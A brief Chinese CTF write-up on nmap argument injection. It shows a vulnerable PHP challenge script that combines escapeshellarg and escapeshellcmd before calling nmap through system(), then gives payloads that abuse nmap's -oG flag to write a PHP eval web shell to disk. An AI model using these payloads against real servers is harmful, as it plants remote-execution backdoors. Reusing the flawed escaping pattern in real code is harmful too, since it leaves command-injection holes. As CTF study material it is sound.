nmap参数注入

参数注入

参考资料

https://www.leavesongs.com/PENETRATION/escapeshellarg-and-parameter-injection.html

https://www.anquanke.com/post/id/107336

https://paper.seebug.org/164/

nmap参数注入

Online Tool

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
<?php

if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];
}

if(!isset($_GET['host'])) {
highlight_file(__FILE__);
} else {
$host = $_GET['host'];
$host = escapeshellarg($host);
$host = escapeshellcmd($host);
$sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']);
echo 'you are in sandbox '.$sandbox;
@mkdir($sandbox);
chdir($sandbox);
echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);
}
?>

-oG参数:

image.png

payload: ?host=' <?php @eval($_POST["hack"]);?> -oG shell.php '

nmap -T5 -sT -Pn --host-timeout 2 -F <?php @eval($_POST["hack"]);?> -oG shell.php

[网鼎杯 2020 朱雀组]Nmap

payload ' <?=eval($_POST["hack"]);?> -oG shell.phtml '